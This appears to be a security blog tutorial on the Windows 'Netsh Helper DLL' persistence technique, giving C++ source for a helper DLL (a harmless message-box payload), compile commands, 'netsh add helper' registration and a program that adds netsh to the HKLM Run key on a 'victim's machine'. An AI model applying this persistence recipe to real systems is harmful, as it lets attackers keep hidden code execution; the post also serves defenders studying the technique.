2 minute read

Hello, cybersecurity enthusiasts and white hackers!

pers

This post is a next part of a series of articles on windows malware persistence techniques and tricks.

Today I’ll wrote about the result of self-researching another persistence trick: Netsh Helper DLL.

netsh

Netsh is a Windows utility that administrators can use to modify the host-based Windows firewall and perform network configuration tasks. Through the use of DLL files, Netsh functionality can be expanded.

This capability enables red teams to load arbitrary DLLs to achieve code execution and therefore persistence using this tool. However, local administrator privileges are required to implement this technique.

practical example

Let’s go to consider practical example. First of all create malicious DLL:

/*
evil.cpp
simple DLL for netsh
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

Compile it:

x86_64-w64-mingw32-gcc -shared -o evil.dll evil.cpp -fpermissive

pers

And transferred to the target victim’s machine.

Netsh interacts with other components of the operating system via dynamic-link library (DLL) files. Each netsh helper DLL offers a comprehensive collection of features. The functionality of Netsh can be expanded using DLL files:

reg query "HKLM\Software\Microsoft\NetSh" /s

pers

Then, the add helper can be used to register the DLL with the netsh utility:

netsh
add helper Z:\2022-05-29-malware-pers-6\evil.dll

pers

pers

Everything is worked perfectly!

However, netsh is not scheduled to start automatically by default. Persistence on the host is created by creating a registry key that executes the application during Windows startup. This can be done immediately using the script below:

/*
pers.cpp
windows persistence via netsh helper DLL
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html
*/
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  // netsh
  const char* netsh = "C:\\Windows\\SysWOW64\\netsh";

  // startup
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0 , KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // create new registry key
    RegSetValueEx(hkey, (LPCSTR)"hack", 0, REG_SZ, (unsigned char*)netsh, strlen(netsh));
    RegCloseKey(hkey);
  }
  return 0;
}

As you can see it’s similar to script from my post about persistence via registry run keys

Check registry run keys:

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s

pers

Compile it:

x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

pers

and run on victim’s machine:

.\pers.exe

pers

When the add helper command is executed to load a DLL file, the following registry key is created:

pers

But there is a caveat. The PoC’s logic needs to be updated to create a new thread so that netsh can still be used while the payload is running. However, when netsh ends, so does your malicious logic.

So, let’s try. Create new DLL (evil2.cpp):

/*
evil2.cpp
simple DLL for netsh
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2022/05/29/malware-pers-6.html
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

DWORD WINAPI Meow(LPVOID lpParameter) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 1;
}

extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved) {
  HANDLE hl = CreateThread(NULL, 0, Meow, NULL, 0, NULL);
  CloseHandle(hl);
  return 0;
}

Compile:

x86_64-w64-mingw32-gcc -shared -o evil2.dll evil2.cpp -fpermissive

pers

and run steps again:

netsh
add helper Z:\2022-05-29-malware-pers-6\evil2.dll

pers

As you can see, everything is ok, netsh can still be used. And we can check registry key for correctness:

reg query "HKLM\Software\Microsoft\NetSh" /s

pers

Because it is based on the exploitation of system features, this type of attack cannot be easily mitigated with preventive controls.

netsh
MITRE ATT&CK: Netsh Helper DLL
source code on github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine